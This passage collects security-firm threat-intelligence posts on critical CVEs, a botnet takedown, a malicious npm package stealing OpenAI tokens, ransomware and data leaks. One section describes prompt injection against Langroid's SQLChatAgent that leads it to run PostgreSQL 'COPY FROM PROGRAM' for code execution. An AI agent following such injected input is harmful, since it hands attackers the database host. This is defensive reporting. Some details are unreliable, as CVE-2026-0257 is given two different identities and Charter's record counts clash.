policies, to identify any unauthorized post-exploitation activity. Fast remediation will prevent malicious actors from executing code and gaining total control over enterprise identities, reducing the risk of a widespread compromise. Technical Takeaways CVE-2026-41089 is a critical Remote Code Execution (RCE) vulnerability in the Netlogon service of Microsoft Windows Server. The vulnerability has a CVSS score of 9.8, indicating maximum severity because it can be exploited over the network without authentication. Successful exploitation grants an attacker SYSTEM privileges on the targeted domain controller, which leads to full control over enterprise identities and infrastructure. CVE-2026-41089 is confirmed to be under active exploitation in the wild by threat actors. Microsoft released patches for all affected Windows Server versions (2012, 2012 R2, 2016, 2019, 2022) as part of its May 2026 Patch Tuesday updates. --- ## CVE-2026-41089 Netlogon RCE Hits Domain Controllers - URL: https://purple-ops.io/blog/cve-2026-41089-netlogon-rce - Date: 2026-06-01 - Category: Threat Intelligence - Tags: cve-2026-41089, netlogon-rce, windows-server, active-exploitation, domain-controller - Reading time: 5 min **Summary:** Microsoft's Netlogon RCE, CVE-2026-41089 with CVSS 9.8, is actively exploited to seize Windows domain controllers and gain SYSTEM privileges. CVE-2026-41089 Netlogon RCE Hits Domain Controllers Microsoft's Netlogon Remote Code Execution vulnerability (CVE-2026-41089, CVSS 9.8) is under active exploitation by threat actors targeting corporate networks worldwide. This critical flaw allows attackers to seize complete control of Windows domain controllers and gain SYSTEM privileges without prior authorization or user interaction. The Centre for Cybersecurity Belgium recently confirmed these in-the-wild attacks, which demonstrates an immediate and severe risk to enterprise infrastructure. The widespread use of Netlogon in enterprise environments makes this vulnerability dangerous. Successful exploitation grants adversaries an uncontested foothold, enabling broad reconnaissance, privilege escalation, lateral movement, and identity compromise across an organization's most sensitive systems. This could also disrupt critical business operations. Microsoft released patches for CVE-2026-41089 as part of its May 2026 Patch Tuesday. This update addressed 118 vulnerabilities, 16 rated as critical. The urgent deployment of these specific fixes is important for organizations to protect their core authentication systems from ongoing exploitation. How is the Netlogon RCE vulnerability being exploited in the wild? Threat actors exploit CVE-2026-41089 by sending specially crafted network requests to unpatched Windows domain controllers. This causes the Netlogon service to improperly handle incoming data, which enables arbitrary code execution on the target system. Its CVSS score of 9.8 shows the vulnerability's critical impact. The exploit grants attackers full SYSTEM privileges on the affected domain controller, giving them complete administrative control over the compromised system. This malicious action requires zero user interaction and no prior authorization, allowing for silent and rapid compromise. The Centre for Cybersecurity Belgium issued an advisory confirming active exploitation, stressing that immediate defensive measures are needed to safeguard corporate infrastructure. Microsoft provided fixes for Windows Server versions from 2012 onwards in its May 2026 Patch Tuesday release. Organizations that have not yet applied these updates remain vulnerable to these active attacks. Prompt application of these security patches is the primary defense against this critical vulnerability. Remediation for CVE-2026-41089 System administrators must immediately deploy fixes for all affected Windows Server versions. This important step is the most effective way to prevent ongoing exploitation. Organizations should also consider isolating exposed domain controllers from untrusted networks to limit their attack surface while patches are applied. Further protective measures include continuous monitoring of network traffic for unusual authentication requests. Security operations centers should regularly review Netlogon logs for anomalies that could indicate attempted or successful exploitation. Maintaining strict patch hygiene and active monitoring remain fundamental defenses against advanced threat groups using vulnerabilities like CVE-2026-41089. Past incidents involving actively exploited Microsoft Exchange zero-days demonstrate the persistent threat posed by critical vulnerabilities in core enterprise services. Dutch Authorities Dismantle Large-Scale Asocks Botnet Affecting 17 Million Devices Dutch authorities, in a joint operation involving the Politie and the National Cyber Security Center (NCSC), have successfully dismantled a massive botnet known as Asocks. This botnet enslaved at least 17 million infected devices globally, using them for various malicious activities. The operation involved seizing more than 200 servers located in the Netherlands that served as the botnet's backend infrastructure. The infected devices encompassed a broad spectrum, including computers, tablets, smartphones, and various IoT devices. The NCSC identified Asocks as a residential proxy service, which, while having legitimate uses, is frequently abused by threat actors. Reports from local news outlet NL Times corroborated the botnet's identity as Asocks. Previous intelligence reports, such as HUMAN's Satori Threat Intelligence team's findings in April 2024, linked Asocks to a campaign dubbed PROXYLIB. This campaign involved infecting Android devices with proxyware from both LumiApps and Asocks, showing a history of malicious activity associated with this service. The law enforcement action involved seizing a subset of these servers from a hosting provider, which took the botnet offline. Botnet Infection and Mitigation Devices typically become part of a botnet when threat actors gain unauthorized access and install malware for remote control. This integrates the compromised device into a network used for cybercriminal activities. The scale of the Asocks botnet shows the pervasive nature of such infections. To counter botnet malware, organizations and individuals should implement several security practices. These include keeping operating systems and software applications up-to-date with the latest security patches. Maintaining visibility of edge devices, such as routers, is also important for identifying and mitigating potential compromises. Additional recommendations include using strong, unique passwords for all accounts and enabling two-factor authentication (2FA) wherever possible. Installing applications only from trusted sources and changing default passwords on new devices, particularly IoT devices, are important steps. Securing Wi-Fi networks with strong encryption protocols like WPA2 or WPA3 can further prevent unauthorized access and potential botnet recruitment. Malicious Codex UI npm Package Steals OpenAI Refresh Tokens from 27,000 Developers A malicious npm package, codexui-android, a popular remote web user interface for OpenAI Codex, has been discovered exfiltrating OpenAI refresh tokens from users. With an estimated 27,000 weekly downloads, this supply chain attack exposed a significant number of developers to persistent account takeover risks. Aikido Security researcher Charlie Eriksen made the discovery on May 27, 2026. The attackers employed a deceptive strategy, developing a useful tool likely to establish a legitimate user base before initiating malicious activity. The important element of this attack is that the malicious code was not present in the public GitHub repository. Instead, it was found exclusively within the published npm package, allowing it to bypass standard source code audits. The attack initiates immediately upon module load, with the dist-cli/index.js file importing a hidden script named chunk-PUR7OUAG.js. This script then checks for local credentials. If found, it launches a data exfiltration routine to steal access_token, id_token, account ID, and the important refresh_token from the auth.json file. The refresh token is dangerous as it typically does not expire, granting attackers indefinite access and impersonation capabilities. Covert Data Exfiltration and Associated Android Apps To evade detection, the exfiltrated data was sent to a server endpoint named sentry.anyclawstore. This endpoint was chosen intentionally to blend in with normal Sentry error-reporting telemetry. The hidden source map even contained a comment from the author: "Send tokens to our startlog endpoint (always)," indicating deliberate intent. Further investigation revealed that the threat actor behind this package, operating under the developer identity BrutalStrike, also targeted Android mobile devices. BrutalStrike has published applications on the Google Play Store, including a paid productivity app called codex.app and another named "OpenClaw Codex Claude AI Agent." Both these applications were found to contain the same malicious infrastructure. These Android apps initially bypassed Google's pre-publish security scans due to their clean initial APK file. Once installed, the app extracts a Termux-derived Linux userland into private storage and launches Node.js using PRoot. It then executes a command to install the latest version of the npm package: pnpm add codexui-android@latest. The exfiltration functionality has been active since version 1.0.0 of the package. Critical Langroid Prompt Injection Vulnerability Exposes LLM Applications to RCE Researchers from Carnegie Mellon University (CMU) and the University of Wisconsin-Madison (UW-Madison) have identified a critical Remote Code Execution (RCE) flaw within the Langroid Python framework, specifically affecting Large Language Model (LLM) applications. This vulnerability, which achieved a maximum CVSS score of 9.8, presents a significant risk to database servers by allowing prompt injection attacks. Developers are urged to upgrade their installations immediately. The core of the problem resides within the framework's SQLChatAgent component. While designed to execute database queries generated by an underlying language model, the component can be manipulated by malicious users through prompt injection. If the database role associated with the agent possesses elevated administrative privileges, the consequences can be severe. An attacker can force the system to execute dangerous dialect-specific primitives. For example, on a PostgreSQL backend, an attacker could trigger commands like COPY FROM PROGRAM. This action facilitates full RCE on the underlying database host, granting the attacker extensive control. This type of vulnerability shows the emerging security challenges in the rapidly evolving field of LLM-powered applications. Security Impact and Patch Availability Successful exploitation of this flaw carries high security implications. Adversaries could execute arbitrary system commands using the database's local privileges, potentially leading to a broader compromise of the network. Furthermore, attackers could silently exfiltrate sensitive corporate data from the server or maliciously modify and delete critical database tables. The ability to pivot through the network from a compromised database server makes this an important entry point for sophisticated attacks. Fortunately, the Langroid development team has addressed this dangerous RCE bug. A security patch is available in version 0.63.0 and all newer releases of the framework. This update introduces a strict SELECT-only allowlist parsed by sqlglot and implements a dialect-aware blocklist to prevent dangerous operation patterns. Users can manually restore the old behavior via a configuration flag in trusted environments, though this is not recommended for most deployments. Addressing vulnerabilities in development frameworks is as critical as patching operating systems. Lessons from past critical Microsoft Defender zero-days show the importance of rapid patching across the entire software supply chain. Hard-Coded Password Exposes Eppendorf BioFlo 320 Bioreactor Systems An urgent industrial control security warning has been issued for laboratory facilities concerning a critical flaw in the Eppendorf BioFlo 320 bioreactor platform. This high-severity vulnerability (CVE-2026-7251, CVSS 9.8) exposes these systems to unauthorized manipulation of sensitive biochemical processes. Lab managers must inspect their device configurations to prevent potential safety incidents. The software defect originates from a poorly secured remote management tool. The underlying system relies on an exposed Virtual Network Computing (VNC) architecture that uses a hard-coded password. Official documentation confirms: "The affected product is vulnerable due to VNC server using a hard-coded password." This access mechanism lacks encrypted network interactions, further reducing its security posture. If an attacker identifies the network address of a target system, they can exploit this default credential to gain unauthenticated administrative authority. The vulnerability report explicitly states: "Once connected, the attacker would have full access to all control panel features for the BioFlo 320." This level of access could enable important changes to experiments, potentially compromising research integrity or causing hazardous conditions in laboratory settings. Remediation for CVE-2026-7251 Eppendorf, the manufacturer, has developed an update to eliminate this threat. The newly released Version 5.0 software patch safely disables the vulnerable remote control protocol. Importantly, all systems originally shipped with this feature deactivated by default. Users could only activate the module manually at the physical workstation tower. Applying the permanent fix resolves the Eppendorf bioreactor security flaw, protecting important laboratory equipment. Administrators should download and apply the latest Version 5.0 software package without delay. Furthermore, security teams should verify that local user role protections adequately restrict configuration changes to trusted supervisors, adding another layer of defense against unauthorized access. Technical Takeaways Active Exploitation of Core Enterprise Systems: Microsoft's Netlogon RCE, CVE-2026-41089 (CVSS 9.8), is actively exploited to gain SYSTEM privileges on Windows domain controllers, requiring immediate patching of Windows Server versions from 2012 onwards. Large-Scale Botnet Disruption: Dutch authorities dismantled the Asocks botnet, which comprised 17 million infected devices, including Android and IoT devices, linked to the PROXYLIB campaign. Supply Chain Attacks Targeting AI Development: A malicious codexui-android npm package, with 27,000 weekly downloads, was found stealing persistent OpenAI refresh tokens via a covert supply chain attack, also impacting related Android applications. Prompt Injection Risks in LLM Frameworks: A critical Langroid Python framework vulnerability (CVSS 9.8) allows RCE via prompt injection in the SQLChatAgent component, enabling arbitrary command execution on database hosts without authentication. ICS/OT Hard-Coded Credential Vulnerability: The Eppendorf BioFlo 320 bioreactor platform has a critical flaw, CVE-2026-7251 (CVSS 9.8), due to a hard-coded VNC password, allowing unauthenticated administrative access to industrial control functions. --- ## Threat Intelligence Briefing on Critical Vulns, Ransomware, Leaks - URL: https://purple-ops.io/blog/threat-intelligence-vulns-ransomware-leaks - Date: 2026-06-01 - Category: report - Tags: threat-intelligence, critical-vulnerabilities, ransomware, data-breach - Reading time: 5 min **Summary:** Critical PAN-OS GlobalProtect vulnerability exploitation, TrapDoor supply chain attacks, and evolving ransomware tactics are impacting global sectors. Threat Intelligence Briefing on Critical Vulns, Ransomware, Leaks Executive Summary CTI reporting for this period shows persistent and evolving cyber adversary activity affecting various sectors globally. Key Developments PAN-OS GlobalProtect Vulnerability Exploitation: A critical authentication bypass vulnerability (CVE-2026-0257) affecting Palo Alto GlobalProtect VPNs has been under active exploitation. This directly affects organizations using affected versions, allowing unauthorized network access. TrapDoor Supply Chain Attack: A supply chain campaign, TrapDoor, spread credential-stealing malware through popular software package registries (npm, PyPI, CratesIO, and other platforms). This affects software development pipelines and any organization consuming dependencies from these platforms, risking developer account compromise and intellectual property exposure. Botnet Dismantlement: Dutch authorities disrupted a large botnet with approximately 17 million infected devices worldwide. This action diminishes global cybercrime infrastructure, potentially reducing various large-scale malicious operations. Evolving Ransomware Tactics: Ransomware actors used an in-person tactic to steal sensitive data from a law firm. This shows a rare, evolving method of data exfiltration, combining physical intrusion with cyber extortion. It affects organizations with high-value, sensitive data. Business Impact The reported activities collectively risk core business functions. Widespread exploitation of internet-facing infrastructure can lead to unauthorized access and data exfiltration from network perimeters. Supply chain compromises threaten software integrity; this affects development processes and deployed applications. Data exposure incidents cause reputational damage, regulatory scrutiny, subsequent financial fraud, and other issues against affected entities or individuals. Ransomware operations cause operational disruption across sectors like healthcare, education, and technology. Notable Trends and Changes vs Last Week Consistent patterns include widespread exploitation of internet-facing systems and increased data exposure incidents. Ransomware operations maintained a broad targeting scope, frequently using double extortion methods. A specific change this week is the confirmed active exploitation of the Palo Alto GlobalProtect vulnerability, requiring urgent attention to network perimeter security. In-person data theft tactics also represent a shift in adversary operational methods beyond purely remote cyber means. Outlook Over the next seven days, active exploitation of newly disclosed critical vulnerabilities, particularly those affecting internet-facing infrastructure, will likely remain prevalent. Ransomware groups are expected to sustain their operational tempo, employing various extortion schemes. Supply chain integrity challenges will likely persist as adversaries seek to inject malicious code into widely used software components. Geopolitical and hacktivist cyber activities targeting critical infrastructure and specific sectors will also likely remain active. Key Threat Intelligence Highlights This week saw several key developments: Dutch authorities, collaborating with international partners, dismantled a botnet that had compromised 17 million devices globally. This malicious network facilitated cybercrimes such as distributed denial-of-service attacks and data theft. The operation sets back criminal operations, protecting users and showing effective cross-border cooperation. An actively exploited authentication bypass (CVE-2026-0257) exists in Palo Alto Networks' PAN-OS GlobalProtect portal and gateway. This critical flaw allows unauthenticated attackers to execute arbitrary code. Organizations must apply patches immediately to protect their systems. The TrapDoor supply chain attack distributes credential-stealing malware by compromising package managers such as npm, PyPI, CratesIO, and other common platforms. This operation targets developers to steal their account credentials, potentially compromising numerous downstream software projects. Its broad presence across these repositories poses a security challenge for the open-source ecosystem. Ransomware actors are escalating tactics by incorporating physical intrusions. Individuals recently gained on-site access to a law firm to directly exfiltrate sensitive client data. This development shows increased attacker boldness and sophistication, requiring organizations to broaden security measures beyond digital perimeters. A severe flaw in the Langroid library allows Remote Code Execution (RCE) via prompt injection. This enables adversaries to trick AI applications into running arbitrary code on the underlying system. This poses a grave danger to tools built with Langroid. The vulnerability means attackers could gain full control over affected systems. Additional Threat Intelligence Context CVE-2026-8732: CVSS: 9.8 (CRITICAL) - Active exploitation of WP Maps Pro () allows unauthenticated administrator account creation on WordPress sites. Available Exploits: CVE-2026-8732 Exploit CVE-2026-8732 Exploit CVE-2026-8732 Exploit Analysis: # CVE Analysis Report: CVE-2026-8732 GitHub Link: Title: WP Google Map Pro CVE-2026-8732 PoC CVE: CVE-2026-8732 (CVSS: 9.8, CRITICAL) CVSS Score: 9.8 CVSS Severity: CRITICAL Based on the analysis: Complexity Score: Easy Remote/Local: Remote Authenticated/Unauthenticated: Unauthenticated Privilege Required: None Risk Score: 100/100 Ease of use, potential impact, and widespread availability contribute to this score. CVE-2026-0257: CVSS: None (CRITICAL) - Widespread exploitation of Palo Alto Networks PAN-OS GlobalProtect authentication bypass (), allows unauthorized VPN access and is listed in CISA KEV. Available Exploits: CVE-2026-0257 Exploit CVE-2026-0257 Exploit CVE-2026-0257 Exploit CVE-2026-0257 Exploit CVE-2026-0257 Exploit Analysis: # CVE Analysis Report: CVE-2026-0257 GitHub Link: Title: PAN-OS GlobalProtect Auth Bypass Detection PoC CVE: CVE-2026-0257 (CVSS: None, CRITICAL) CVSS Score: None CVSS Severity: CRITICAL Based on the analysis: Complexity Score: Easy Remote/Local: Remote Authenticated/Unauthenticated: Unauthenticated Privilege Required: None Risk Score: 91/100 Ease of use and potential impact contribute to this score. CVE-2026-35616: CVSS: 9.8 (VERY CRITICAL) - Active exploitation of a pre-authentication API bypass in FortiClient EMS () delivers EKZ Infostealer and allows unauthenticated administrative actions. Available Exploits: CVE-2026-35616 Exploit CVE-2026-35616 Exploit CVE-2026-35616 Exploit CVE-2026-35616 Exploit CVE-2026-35616 Exploit Analysis: # CVE Analysis Report: CVE-2026-35616 GitHub Link: Title: FortiClient EMS Safe Detector (CVE-2026-35616) CVE: CVE-2026-35616 (CVSS: 9.8, VERY CRITICAL) CVSS Score: 9.8 CVSS Severity: VERY CRITICAL Based on the analysis: Complexity Score: Easy Remote/Local: Remote Authenticated/Unauthenticated: Unauthenticated Privilege Required: None Risk Score: 100/100 Ease of use and potential impact contribute to this score. Critical Gogs (0.14.2 and 0.15.0+dev) remote code execution zero-day (CVSS 9.4) due to an argument injection flaw, exploitable by unauthenticated internet users due to default open registration. CVE-2026-48172: CVSS: None (VERY CRITICAL) - Active exploitation of LiteSpeed cPanel user-end plugin Redis RCE (), allows unauthenticated escalation to root on shared hosting servers and prompted a CISA BOD. Available Exploits: CVE-2026-48172 Exploit CVE-2026-48172 Exploit CVE-2026-48172 Exploit Analysis: # CVE Analysis Report: CVE-2026-48172 GitHub Link: Title: CVE-2026-48172 PoC Template CVE: CVE-2026-48172 (CVSS: None, VERY CRITICAL) CVSS Score: None CVSS Severity: VERY CRITICAL Based on the analysis: Complexity Score: NA Remote/Local: Remote Authenticated/Unauthenticated: Unauthenticated Privilege Required: None Risk Score: 75/100 Ease of use, potential impact, and widespread availability contribute to this score. Critical Windows DNS Client remote code execution (CVSS 9.8) with three observed active exploits, alongside public zero-days (BlueHammer, RedSun, UnDefend) in Windows Defender/BitLocker. CVE-2026-41089: Active exploitation of Netlogon RCE () on Windows domain controllers. CVE-2026-0257: CVSS: None (CRITICAL) - Publicly available exploit code and reported exploitation for a FreeBSD kernel stack buffer overflow () that leads to local privilege escalation. Available Exploits: CVE-2026-0257 Exploit CVE-2026-0257 Exploit CVE-2026-0257 Exploit CVE-2026-0257 Exploit CVE-2026-0257 Exploit Analysis: # CVE Analysis Report: CVE-2026-0257 GitHub Link: Title: PAN-OS GlobalProtect Auth Bypass Detection PoC CVE: CVE-2026-0257 (CVSS: None, CRITICAL) CVSS Score: None CVSS Severity: CRITICAL Based on the analysis: Complexity Score: Easy Remote/Local: Remote Authenticated/Unauthenticated: Unauthenticated Privilege Required: None Risk Score: 91/100 Ease of use and potential impact contribute to this score. Widespread campaigns target the npm ecosystem through dependency confusion and deployment of RAT packages, like the forge-jsxy family, for credential theft and persistent access. CVE-2026-39987: CVSS: None (CRITICAL) - Pre-authenticated RCE in Marimo notebook service () has been observed in targeted intrusions for credential harvesting from cloud environments. Available Exploits: CVE-2026-39987 Exploit CVE-2026-39987 Exploit CVE-2026-39987 Exploit CVE-2026-39987 Exploit CVE-2026-39987 Exploit Analysis: # CVE Analysis Report: CVE-2026-39987 GitHub Link: Title: CVE-2026-39987 version detector (Marimo) CVE: CVE-2026-39987 (CVSS: None, CRITICAL) CVSS Score: None CVSS Severity: CRITICAL Based on the analysis: Complexity Score: Easy Remote/Local: Remote Authenticated/Unauthenticated: Unauthenticated Privilege Required: None Risk Score: 91/100 Ease of use, potential impact, and widespread availability contribute to this score. Extensive exposure of identity, genetic, and messaging data through major breaches affecting entities such as Charter Communications (4.9M accounts), 23andMe (6.9M customers), and massive Telegram user datasets (claimed 1.2B records). DDoS attacks, such as the one claimed by "Infrastructure Destruction Squad" against Ukrainian OPW Fuel Management Systems, disrupting remote visibility and control of fuel infrastructure. Ransomware Activity Overview Ransomware groups like Krybit, CMD, Lapsus, Bravox, Gunra, and Stormous are actively targeting healthcare, education, insurance, AI startups, entertainment, and smaller tech/service providers across multiple continents. These operations commonly employ double extortion tactics, use leak sites, and gain initial access through RDP/VPS resale, initial access broker offerings, and web application exploitation. Data breach activity includes a claimed 1TB exfiltration from the Israeli Holocaust victims welfare center by the Handala group, an unverified claim of 10+ petabytes from China NSCC Supercomputing Center, and widespread sales of AT&T Mobile, Salesforce, HCA Healthcare, and various government/telecom datasets. Geopolitical cyber activity features Infrastructure Destruction Squad claiming a network takedown at Noi Bai International Airport via old MikroTik RouterOS exploitation and performing DDoS actions against Ukrainian industrial control systems. The TRK25 group promotes an advanced SCADA industrial exploitation framework. Hacktivist actions are observed from pro-Palestinian, pro-Russian, and Indonesian groups, among others. The broader cybercrime ecosystem shows extensive advertising of offensive services, tools, and training bundles. Concerns exist about malicious npm packages and residential-proxy botnet takedowns. Underground markets also display a supply of government, financial, and telecom databases from regions like Asia, the Middle East, Europe, and the Americas. They also trade forged court orders and services for domain suspension to assist fraud and takedown operations. During the reporting period, 170 total victims were identified across 36 active ransomware groups. The top 5 most active groups accounted for 74 victims. Top 5 Ransomware Groups DragonForce - 37 victim(s) Notable victims: Allianceadjustment.com, Arsenalscaffold.com, Businessrecord.com, Delbrook capital advisors, Dentonfirm.com (and 32 more) LockBit - 10 victim(s) Notable victims: columbiaorthogroup.com, groupe-mbm.com, grupodetoni.com.br, gu, hgs-wt.at (and 5 more) Akira - 9 victim(s) Notable victims: Alpine aerotech, General doors, Gone fishin' marine, Gs yuasa lithium power, Interstate roofing (and 4 more) Everest - 9 victim(s) Notable victims: Advanced psychiatry associates, Akm, Asopagos s.a., L&p aesthetics, Sidra kuwait hospital (and 4 more) Medusa Locker - 9 victim(s) Notable victims: Baeaoai, Baeaxai, Bakaxah, Dadolighting demo, Dolrad (and 4 more) Deep Web Deep Web Observations This week's deep web activity revealed extensive data exposures across multiple sectors and geographies, with a concentration on governmental, military, and critical financial institutions. Threat actors posted or offered for sale vast datasets containing sensitive national defense information, full financial and personal records of citizens, and internal law enforcement intelligence. The trend shows a continued pursuit of high-value targets for strategic and financial exploitation. What major data leaks appeared on deep web forums this week? Several large-scale data leaks emerged this week. The compromise of a Chinese supercomputing network and the National Credit Information Center of Vietnam stood out for their scale and sensitivity. Other incidents involved national law enforcement agencies, a major telecommunications provider, and a customer support platform for a widely used communication service. China National Supercomputing Center (NSCC) Breach: A 10+ petabyte dataset, described as direct exfiltration from China's supercomputing network, was advertised. This collection includes years of raw simulation data, design files, satellite telemetry, and classified research from national defense contractors (AVIC Aviation Industry and COMAC). The leak also contains employee personal data, including Chinese ID card scans with names and addresses. National Credit Information Center of Vietnam (CIC) Exposure: Over 160 million records from Vietnam's national credit information center were put up for sale. This extensive database contains detailed personal identifying information (PII) like full names, dates of birth, national ID cards (CCCD, CMND), passport numbers, driving license numbers, military IDs, student IDs, addresses, phone numbers, and email addresses. Financial details are present, like loan data, various balance types (e.g., loan, bad debt, credit card), outstanding debt figures, and credit card numbers. Company information and audit logs complete this financial dataset. Charter Communications, Inc. Customer Data: A dataset comprising over 42 million records of PII from Charter Communications, a major US telecommunications company, was released. The actor claimed this release happened after unsuccessful negotiations. DIRANDRO: Peruvian National Police Data: A database containing approximately 300,000 folders, totaling 7.8 GB, from DIRANDRO (the Drug Enforcement Directorate of the Peruvian National Police) was offered. This compromise includes personal identification data (full names, national ID, police identification codes) for police/military personnel, demographic information, family details, precise residential addresses, and civil registry data. Police intervention data is present, including narratives of incidents, exact geographic coordinates of events, descriptions of seized illicit substances, and images of national ID documents (DNI). Argentine Government Institutions Compilation: A 650 GB compilation of databases from multiple Argentine government institutions was made available. Entities affected include GDEBA, IOMA, Buenos Aires City Police, AFIP (tax authority), BCRA (central bank), and the Federal Police. The data includes emails, passwords, phone numbers, document numbers, biometric photos, ranks, credit scores, and confidential PDF documents. The actor mentioned targeting numerous other Latin American government institutions. Philippines Land Transportation Office (LTO) Data: Over 14 million records from the Philippines' Land Transportation Office were listed, including PII like full names, addresses, dates of birth, sex, civil status, nationality, weight, height, and blood type. The breach includes over 14 million user images, with the actor claiming to possess proof of concept (0day) for the LTO system. Discord Data through Zendesk: A 1.6 TB dataset pertaining to Discord users, allegedly sourced from Zendesk (a customer support platform), was advertised. This data includes user email addresses, Discord usernames, phone numbers, support ticket/chat logs, IP addresses, the last four digits of credit cards, and images of ID cards or passports for age verification for approximately 70,000 users. Russian GRU Advanced Weapons Report Leak: A document titled "Top Secret GRU Advanced Weapons Report 2025" was freely distributed on a forum, purportedly originating from Russia's Main Intelligence Directorate. What is the nature and scope of these breaches? The nature of these breaches ranges from direct exfiltration of highly classified state secrets and critical infrastructure data to widespread compromises of sensitive personal and financial information affecting millions of individuals. The scope often involves full datasets, including identity documents, financial records, and operational intelligence. This enables various downstream malicious activities. The NSCC breach compromises state-sponsored research and development. It provides adversaries with access to advanced military and aerospace designs that could accelerate their own programs or reveal strategic vulnerabilities. The scale of 10+ petabytes signifies a deep, sustained infiltration. The National Credit Information Center of Vietnam and Charter Communications breaches show the monetization of large-scale PII and financial data. These datasets offer a foundation for identity theft, financial fraud, targeted social engineering campaigns, and account takeovers due to the individual and corporate financial attributes present. The breaches of DIRANDRO (Peruvian National Police) and multiple Argentine government institutions carry substantial risks for public administration and law enforcement personnel. Exposure of police and military personnel data, including identity documents and operational details, could lead to targeted harassment, blackmail, physical threats, or compromise of ongoing investigations. This undermines trust in government security, impeding critical functions. The Land Transportation Office (LTO) Philippines data, particularly with 14 million user images alongside full PII, creates an avenue for high-fidelity identity impersonation and fraudulent document creation. This level of biometric-linked data raises the risk beyond standard identity theft. The Discord data from Zendesk, though from a customer service platform, is particularly sensitive due to the inclusion of actual ID card/passport photos for age verification. This enables high-confidence identity fabrication. The associated support ticket logs can also reveal sensitive personal issues or specific vulnerabilities for targeted social engineering. Beyond data leaks, one item offered initial access broker (IAB) services to an APAC Telecom target and an Eastern Europe B2B platform. This included verified network configurations, dynamic application behaviors, and pre-authentication session bypass payloads, alongside internal metadata. This kind of offering provides a foothold for subsequent, more damaging attacks, rather than a direct data leak. Are there any patterns or trends in the breach data? A recurring pattern in this week's data involves targeting national critical infrastructure and government entities, particularly those holding vast amounts of citizen data or sensitive state intelligence. There is a persistent market for full PII and financial records, often affecting entire populations within a given country. Government and Critical Infrastructure as Prime Targets: Many observed incidents pertain to government agencies (Argentina, Peru, Philippines) or entities integral to national operations (China's supercomputing, Vietnam's credit bureau). These targets are attractive for espionage, strategic advantage, large-scale data harvesting, or disruption. Large-Scale PII and Financial Data Exploitation: Multiple breaches involved millions of individual records, including detailed PII, financial histories, and identity document images. This indicates an enduring demand for datasets suitable for identity theft, fraud, account takeovers, and other illicit activities on a massive scale. Geographic Diversity of Victims: The affected organizations span multiple continents, including Asia (China, Vietnam, Philippines), North America (USA), and South America (Argentina, Peru). This global distribution shows the ubiquitous nature of deep web activities. Mixed Actor Sophistication: While established and reputable actors like ShinyHunters continue to conduct large-volume breaches, several new or low-reputation users are also surfacing with access to sensitive government and classified data, suggesting a broad base of actors or the fragmentation of capabilities. Initial Access as a Commodity: The sale of pre-authenticated access to corporate networks suggests a sub-economy where initial entry points are prepared and sold, enabling other threat actors to execute various follow-on attacks without needing to establish their own initial foothold. Broad Data Spectrum: The compromised data is diverse, ranging from advanced military research and blueprints to individual credit scores, criminal intervention records, and customer support interactions, reflecting varied motivations among threat actors-from state-sponsored espionage to common cybercrime. What is the potential impact of these deep web breaches? The potential impact of this week's deep web breaches is broad, extending from national security repercussions to widespread individual financial and personal harms, and a general erosion of trust in institutions. The exposure of 10+ petabytes of classified military and aerospace research from China's NSCC could compromise national security. Such detailed data, including schematics for advanced satellites and defense simulations, provides foreign adversaries with intelligence that could accelerate their own technological advancements, expose vulnerabilities in existing systems, or inform counter-intelligence strategies. This intellectual property loss has long-term strategic implications. Similarly, the Russian GRU Advanced Weapons Report could reveal classified defense strategies and capabilities, offering tactical advantages to opposing forces. For individuals, the 160 million records from the National Credit Information Center of Vietnam and the 42 million PII records from Charter Communications create an expansive surface for identity theft, sophisticated financial fraud, and targeted scams. Detailed financial histories combined with personal identifiers empower malicious actors to open fraudulent accounts, obtain loans, or impersonate victims with high success rates. Including credit card numbers, even partial, reduces the effort for carding schemes. The breaches of DIRANDRO (Peruvian National Police) and multiple Argentine government institutions carry substantial risks for public administration and law enforcement personnel. Exposure of police and military personnel data, including identity documents and operational details, could lead to targeted harassment, blackmail, physical threats, or compromise of ongoing investigations. This undermines trust in government security, impeding critical functions. The Land Transportation Office (LTO) Philippines data, particularly with 14 million user images alongside full PII, creates an avenue for high-fidelity identity impersonation and fraudulent document creation. This level of biometric-linked data raises the risk beyond standard identity theft. The Discord data from Zendesk, though from a customer service platform, is particularly sensitive due to the inclusion of actual ID card/passport photos for age verification. This enables high-confidence identity fabrication. The associated support ticket logs can also reveal sensitive personal issues or specific vulnerabilities for targeted social engineering. The initial access broker (IAB) services serve as precursors to future destructive events. By providing verified entry points into critical infrastructure, these sales allow other actors to deploy ransomware, conduct long-term espionage, or orchestrate sabotage. This escalates the scope and severity of potential future incidents. In summary, this week's deep web activity shows a persistent and evolving threat where sensitive national and personal data is continuously sought, acquired, and traded. This has far-reaching consequences for state security, economic stability, individual privacy, and public trust. Sources Dutch Authorities Dismantle Botnet Linked to 17 Million Infected Devices PAN-OS GlobalProtect Authentication Bypass (CVE-2026-0257) Under Active Exploitation TrapDoor Supply Chain Attack Spreads Credential-Stealing Malware via npm, PyPI, and CratesIO Ransomware Actors Show Up In Person to Steal Law Firm Data Critical Langroid Vulnerability Allows RCE via Prompt Injection --- ## PAN-OS CVE-2026-0257 Auth Bypass Actively Exploited - URL: https://purple-ops.io/blog/pan-os-cve-2026-0257-auth - Date: 2026-06-01 - Category: CVE Analysis - Tags: palo-alto, pan-os, cve-2026-0257, auth-bypass - Reading time: 5 min **Summary:** Palo Alto Networks PAN-OS is critically affected by CVE-2026-0257, an authentication bypass vulnerability under active exploitation. PAN-OS CVE-2026-0257 Auth Bypass Actively Exploited Palo Alto Networks PAN-OS is affected by CVE-2026-0257, an authentication bypass vulnerability currently under active exploitation. This critical flaw allows unauthorized access to systems running PAN-OS, threatening network security perimeters. Though specific technical details, such as the CVSS score and affected version ranges, have not been publicly disclosed, the active exploitation status requires immediate attention from security teams. The presence of in-the-wild exploitation for CVE-2026-0257 increases its severity beyond what an unrated vulnerability might typically suggest. An authentication bypass on a network security platform like PAN-OS can directly lead to compromised administrative access, VPN system breaches, or manipulation of network traffic. Organizations relying on Palo Alto Networks devices for perimeter defense are at immediate risk. PurpleOps assesses this vulnerability as critical due to its nature and exploitation status. This intelligence post compiles available facts and outlines the implications for organizations, focusing on detection and remediation strategies based on limited public information. What is CVE-2026-0257 and why is it critical? CVE-2026-0257 is an authentication bypass vulnerability affecting Palo Alto Networks PAN-OS. This means an attacker can circumvent standard authentication mechanisms to gain unauthorized access to protected functionalities or resources. Its criticality stems from the role PAN-OS plays in an organization's network infrastructure; it typically acts as a firewall, VPN concentrator, or network access controller. An authentication bypass in such an important security appliance can grant an adversary direct access to sensitive administrative interfaces. This allows them to reconfigure security policies, establish malicious VPN tunnels, create backdoors, or 